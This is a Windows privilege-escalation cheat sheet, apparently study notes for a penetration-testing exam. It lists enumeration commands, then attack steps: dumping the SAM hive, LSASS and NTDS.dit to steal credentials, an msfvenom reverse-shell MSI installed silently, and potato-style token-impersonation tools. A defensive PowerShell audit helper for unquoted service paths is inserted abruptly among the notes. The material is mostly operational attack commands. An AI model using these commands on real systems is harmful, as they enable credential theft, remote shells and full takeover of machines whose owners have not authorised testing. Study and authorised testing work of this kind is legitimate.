Pentest_Notes

🪟 Privilege Escalation — Windows

Organized notes for Windows privilege escalation techniques. Last Updated: 2026-03-27


Enumeration

Checklist

System Information

# System details
systeminfo
whoami /all
whoami /groups
whoami /priv

# User enumeration
net user
quser
net localgroup
net localgroup administrators

# Environment variables
Get-ChildItem Env:
$env:PATH

# Command history
Get-History
(Get-PSReadlineOption).HistorySavePath
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Domain check
dsregcmd /status

PowerView Import

Set-ExecutionPolicy Bypass -Scope Process
Import-Module C:\Tools\PowerView.ps1
Get-NetDomain

Automated Enumeration

# WinPEAS
.\winPEASx64.exe

# Seatbelt — system checks
.\Seatbelt.exe -group=system

# Seatbelt — all checks
.\Seatbelt.exe -group=all

# PowerUp — all checks
. .\PowerUp.ps1
Invoke-AllChecks

Service Exploitation

Service Binary Hijacking

# List services with paths
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -eq "Running"}

# Check for unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
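The wmic one-liner above only filters on start mode and path; the following PowerShell audit helper (added here, not part of the original notes or of any tool the notes mention) applies the actual condition a hijack needs, an unquoted binary path containing a space, and marks whether the binary lives under the system directory so that findings can be triaged and the service's binPath re-quoted. The function name `Get-UnquotedServicePath` is an assumed name.

```powershell
# Added audit helper (not from the original notes). Run in an elevated
# PowerShell session so that all services are visible.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }

        # A path that is already quoted cannot be split by the service
        # control manager, so it is not a candidate.
        if ($path.StartsWith('"')) { return }

        # Keep only the executable part: arguments after ".exe" do not matter.
        $exe = $path
        $idx = $path.ToLower().IndexOf('.exe')
        if ($idx -ge 0) { $exe = $path.Substring(0, $idx + 4) }

        # Without a space in the executable path there is nothing to hijack.
        if ($exe -notmatch ' ') { return }

        [PSCustomObject]@{
            Name        = $_.Name
            StartMode   = $_.StartMode
            State       = $_.State
            RunAs       = $_.StartName
            Path        = $exe
            # Directories under %SystemRoot% are normally not writable by
            # standard users; flag them so they can be deprioritised.
            InSystemDir = ($exe -like "$env:SystemRoot*")
        }
    }
}

# Auto-start services outside the system directory are the ones to fix first.
Get-UnquotedServicePath |
    Where-Object { $_.StartMode -eq 'Auto' -and -not $_.InSystemDir } |
    Format-Table -AutoSize
```

Remediation for a finding is to quote the path in the service configuration, e.g. `sc.exe config <ServiceName> binPath= "\"C:\Program Files\Vendor\svc.exe\""` (the inner quotes are escaped with backslashes), and to verify the containing directories are not writable by standard users.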

DLL Hijacking


Scheduled Tasks

# List all scheduled tasks
schtasks /query /fo LIST /v

# Filter non-Microsoft tasks
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike '\Microsoft\*'} | Select-Object TaskName, TaskPath, State

Credential Hunting

Stored Credentials

# Check for stored credentials
cmdkey /list

# RunAs with stored creds
runas /savecred /user:<domain>\<user> cmd.exe

# Search for passwords in files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

# Search recursively in user directories
Get-ChildItem -Path C:\Users\ -Include * -File -Recurse -ErrorAction SilentlyContinue

SAM Database

# Save SAM, SYSTEM, SECURITY hives
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

# Transfer to attacker and dump
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

LSASS Memory Dump

# Find LSASS PID
Get-Process lsass

# Dump LSASS via rundll32
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

# Parse LSASS dump on Linux
pypykatz lsa minidump /path/to/lsass.dmp

NTDS.dit Extraction

# Volume Shadow Copy
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

Common Privilege Escalation Vectors

AlwaysInstallElevated

# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both return 1:

# Generate malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o shell.msi

# Install on target
msiexec /quiet /qn /i shell.msi

Token Impersonation (SeImpersonatePrivilege)

# Check if we have SeImpersonatePrivilege
whoami /priv

If SeImpersonatePrivilege is enabled, use:

# PrintSpoofer
.\PrintSpoofer64.exe -i -c powershell

# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"

File System Inspection

# Check root of C:\
dir C:\ /a

# Check for Windows.old
dir C:\Windows.old /a

# Check hosts file
type C:\Windows\System32\Drivers\etc\hosts

# Search for flags
Get-ChildItem -Path C:\ -Recurse -File -Filter "proof.txt" -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Recurse -File -Filter "local.txt" -ErrorAction SilentlyContinue

Application Inspection

# List installed applications
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, InstallLocation
Get-ItemProperty "HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, InstallLocation

# Running processes (sorted by CPU)
Get-Process | Sort-Object CPU -Descending

⚠️ CPTS Exam Tip: Always check for KeePass installations — they may contain password databases.


Common Pitfalls / Gotchas

References & Further Reading